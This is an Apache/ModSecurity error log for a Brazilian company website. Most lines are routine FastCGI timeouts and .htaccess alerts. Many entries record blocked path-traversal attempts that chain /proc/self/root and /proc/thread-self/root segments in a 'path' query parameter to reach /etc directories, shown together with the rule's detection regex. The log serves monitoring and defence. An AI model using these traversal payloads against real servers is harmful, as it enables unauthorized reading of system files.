[Thu Mar 19 09:50:46.445913 2026] [:error] [pid 17887:tid 140411658000128] [client 74.7.243.128:33144] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvxJgkwaGbbGflqUZC3BAAAAMo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 09:50:53.150390 2026] [:error] [pid 27403:tid 140411599251200] [client 74.7.243.128:46730] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvxLRkFeYa1D6dYQnDoxgAAAdE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:50:56.138621 2026] [proxy_fcgi:error] [pid 27293:tid 140411548894976] (70007)The timeout specified has expired: [client 179.188.53.243:44868] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:51:11.230493 2026] [mime_magic:error] [pid 30077:tid 140411683178240] (70014)End of file found: [client 57.141.18.112:47478] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:51:17.060382 2026] [proxy_fcgi:error] [pid 27403:tid 140411741927168] (70007)The timeout specified has expired: [client 179.188.53.243:45326] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:51:41.129813 2026] [proxy_fcgi:error] [pid 26799:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:45820] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:52:06.129808 2026] [proxy_fcgi:error] [pid 19093:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:46408] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:52:32.046042 2026] [proxy_fcgi:error] [pid 17887:tid 140411624429312] (70007)The timeout specified has expired: [client 179.188.53.243:47068] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:52:37.977229 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.243.128:37672] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvxleyqAr6etmhZHNpZ1wAAAEo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:52:54.041816 2026] [proxy_fcgi:error] [pid 27403:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:47560] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:53:21.137854 2026] [proxy_fcgi:error] [pid 17653:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:48244] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:53:27.262939 2026] [:error] [pid 30077:tid 140411557287680] [client 74.7.228.61:58530] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvxx_u8EFLIOrSqIpudfAAAAlY"]
[Thu Mar 19 09:53:29.656109 2026] [:error] [pid 30077:tid 140411548894976] [client 74.7.243.128:38152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvxyfu8EFLIOrSqIpudfgAAAlc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 09:53:29.863323 2026] [core:alert] [pid 31803:tid 140411540502272] [client 57.141.18.43:50734] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:53:32.496336 2026] [core:alert] [pid 14269:tid 140411590858496] [client 57.141.18.6:50800] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:53:54.041805 2026] [proxy_fcgi:error] [pid 26799:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:49066] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:54:25.925844 2026] [proxy_fcgi:error] [pid 14269:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:49816] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:54:55.121846 2026] [proxy_fcgi:error] [pid 26799:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:50458] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:55:18.821811 2026] [mime_magic:error] [pid 27403:tid 140411658000128] (70014)End of file found: [client 57.141.18.31:52804] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 09:55:20.153816 2026] [proxy_fcgi:error] [pid 14269:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:51060] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:55:30.203759 2026] [:error] [pid 26799:tid 140411683178240] [client 74.7.244.43:42752] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvyQta6ubjKNq_cu4ZI9wAAA0c"]
[Thu Mar 19 09:55:44.125894 2026] [proxy_fcgi:error] [pid 17887:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:51578] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:55:44.686727 2026] [core:alert] [pid 27403:tid 140411649607424] [client 57.141.18.7:53690] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 09:55:48.510698 2026] [:error] [pid 30077:tid 140411741927168] [client 74.7.243.128:38152] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvyVPu8EFLIOrSqIpudzAAAAkA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 09:56:06.125903 2026] [proxy_fcgi:error] [pid 17887:tid 140411607643904] (70007)The timeout specified has expired: [client 179.188.53.243:52198] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:56:29.697921 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:52696] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:56:49.670497 2026] [:error] [pid 14269:tid 140411741927168] [client 74.7.243.128:54046] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/modsecurity"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvykQbLMZ6AikZjR9VXGQAAAAA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Thu Mar 19 09:56:53.129777 2026] [proxy_fcgi:error] [pid 17653:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:53242] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:57:16.127184 2026] [proxy_fcgi:error] [pid 19093:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:53848] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:57:38.125882 2026] [proxy_fcgi:error] [pid 30077:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:54376] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:58:01.113811 2026] [proxy_fcgi:error] [pid 17887:tid 140411658000128] (70007)The timeout specified has expired: [client 179.188.53.243:54864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:58:25.137818 2026] [proxy_fcgi:error] [pid 17653:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:55460] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:58:30.464755 2026] [:error] [pid 31803:tid 140411699963648] [client 74.7.228.61:51346] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvy9uyqAr6etmhZHNpamAAAAEU"]
[Thu Mar 19 09:58:49.125791 2026] [proxy_fcgi:error] [pid 15826:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:55964] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:59:16.125811 2026] [proxy_fcgi:error] [pid 26799:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:56630] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 09:59:50.044979 2026] [proxy_fcgi:error] [pid 19093:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:57362] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:00:12.038642 2026] [:error] [pid 17887:tid 140411708356352] [client 74.7.243.128:46726] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvzXAkwaGbbGflqUZC4qAAAAMQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:00:23.145962 2026] [proxy_fcgi:error] [pid 17887:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58038] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:00:32.847194 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.244.43:45356] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abvzcMdf6f5d65gmYZRvmwAAAsI"]
[Thu Mar 19 10:01:00.137788 2026] [proxy_fcgi:error] [pid 27403:tid 140411590858496] (70007)The timeout specified has expired: [client 179.188.53.243:58910] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:01:00.460985 2026] [:error] [pid 27293:tid 140411540502272] [client 74.7.243.128:37196] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abvzjP-YZRR_7pZ7nDKFmwAAA9g"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:01:25.127974 2026] [proxy_fcgi:error] [pid 26799:tid 140411599251200] (70007)The timeout specified has expired: [client 179.188.53.243:59620] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:01:36.394272 2026] [mime_magic:error] [pid 15826:tid 140411582465792] (70014)End of file found: [client 57.141.18.58:33390] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:01:36.578431 2026] [mime_magic:error] [pid 26799:tid 140411548894976] (70014)End of file found: [client 57.141.18.124:33776] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:01:48.124459 2026] [proxy_fcgi:error] [pid 27293:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:60310] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:01:54.231556 2026] [core:alert] [pid 17653:tid 140411548894976] [client 57.141.18.83:33616] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:01:55.651146 2026] [core:alert] [pid 15826:tid 140411582465792] [client 57.141.18.85:33904] /home/storage/0/fc/16/bandeirantesbomb3/public_html/.htaccess: </FilesMatch> without matching <FilesMatch> section
[Thu Mar 19 10:02:10.126757 2026] [proxy_fcgi:error] [pid 26799:tid 140411574073088] (70007)The timeout specified has expired: [client 179.188.53.243:60864] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:02:32.133835 2026] [proxy_fcgi:error] [pid 19093:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:33080] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:02:55.121846 2026] [proxy_fcgi:error] [pid 27403:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:33730] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:03:23.125800 2026] [proxy_fcgi:error] [pid 19093:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:34424] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:03:32.628377 2026] [:error] [pid 15826:tid 140411674785536] [client 74.7.228.61:44508] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv0JOoXxyEfFpUF8f8IuAAAAUg"]
[Thu Mar 19 10:03:46.133802 2026] [proxy_fcgi:error] [pid 27403:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:34946] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:04:09.057834 2026] [proxy_fcgi:error] [pid 26799:tid 140411716749056] (70007)The timeout specified has expired: [client 179.188.53.243:35498] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:04:10.017217 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:38634] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/networkmanager"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv0Sta6ubjKNq_cu4ZKjwAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 10:04:32.133790 2026] [proxy_fcgi:error] [pid 14269:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36008] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:04:54.069802 2026] [proxy_fcgi:error] [pid 31803:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:36564] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:05:16.121204 2026] [proxy_fcgi:error] [pid 15826:tid 140411733534464] (70007)The timeout specified has expired: [client 179.188.53.243:36958] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:05:36.368400 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.244.43:40530] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv0n8df6f5d65gmYZRwUAAAAs4"]
[Thu Mar 19 10:05:46.137785 2026] [proxy_fcgi:error] [pid 27403:tid 140411649607424] (70007)The timeout specified has expired: [client 179.188.53.243:37582] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:06:12.117797 2026] [proxy_fcgi:error] [pid 30077:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:38156] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:06:39.133779 2026] [proxy_fcgi:error] [pid 17653:tid 140411666392832] (70007)The timeout specified has expired: [client 179.188.53.243:38690] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:07:02.008327 2026] [:error] [pid 14269:tid 140411599251200] [client 74.7.243.128:56386] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abv09gbLMZ6AikZjR9VYNAAAABE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Thu Mar 19 10:07:12.069901 2026] [proxy_fcgi:error] [pid 14269:tid 140411674785536] (70007)The timeout specified has expired: [client 179.188.53.243:39340] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:07:44.069838 2026] [proxy_fcgi:error] [pid 15826:tid 140411616036608] (70007)The timeout specified has expired: [client 179.188.53.243:40174] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:08:07.121807 2026] [proxy_fcgi:error] [pid 30077:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:40734] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:08:16.537034 2026] [mime_magic:error] [pid 15826:tid 140411632822016] (70014)End of file found: [client 57.141.18.83:42476] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:08:29.141783 2026] [proxy_fcgi:error] [pid 19093:tid 140411540502272] (70007)The timeout specified has expired: [client 179.188.53.243:41282] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:08:30.619944 2026] [mime_magic:error] [pid 27293:tid 140411565680384] (70014)End of file found: [client 57.141.18.90:42512] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:08:31.343805 2026] [:error] [pid 27293:tid 140411582465792] [client 74.7.228.61:43328] [client 74.7.228.61] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv1T_-YZRR_7pZ7nDKGgQAAA9M"]
[Thu Mar 19 10:08:57.132925 2026] [proxy_fcgi:error] [pid 27403:tid 140411557287680] (70007)The timeout specified has expired: [client 179.188.53.243:41914] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:09:19.033810 2026] [proxy_fcgi:error] [pid 27403:tid 140411632822016] (70007)The timeout specified has expired: [client 179.188.53.243:42434] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:09:41.161785 2026] [proxy_fcgi:error] [pid 26799:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:42954] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:09:50.191775 2026] [mime_magic:error] [pid 30077:tid 140411632822016] (70014)End of file found: [client 57.141.18.37:44530] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:10:03.173774 2026] [proxy_fcgi:error] [pid 17887:tid 140411725141760] (70007)The timeout specified has expired: [client 179.188.53.243:43484] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:10:18.863929 2026] [mime_magic:error] [pid 15826:tid 140411691570944] (70014)End of file found: [client 57.141.18.83:44786] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Thu Mar 19 10:10:27.145824 2026] [proxy_fcgi:error] [pid 14269:tid 140411582465792] (70007)The timeout specified has expired: [client 179.188.53.243:43968] AH01075: Error dispatching request to : (polling)
[Thu Mar 19 10:10:36.481163 2026] [:error] [pid 14269:tid 140411607643904] [client 74.7.244.43:40346] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abv1zAbLMZ6AikZjR9VYjwAAABA"]
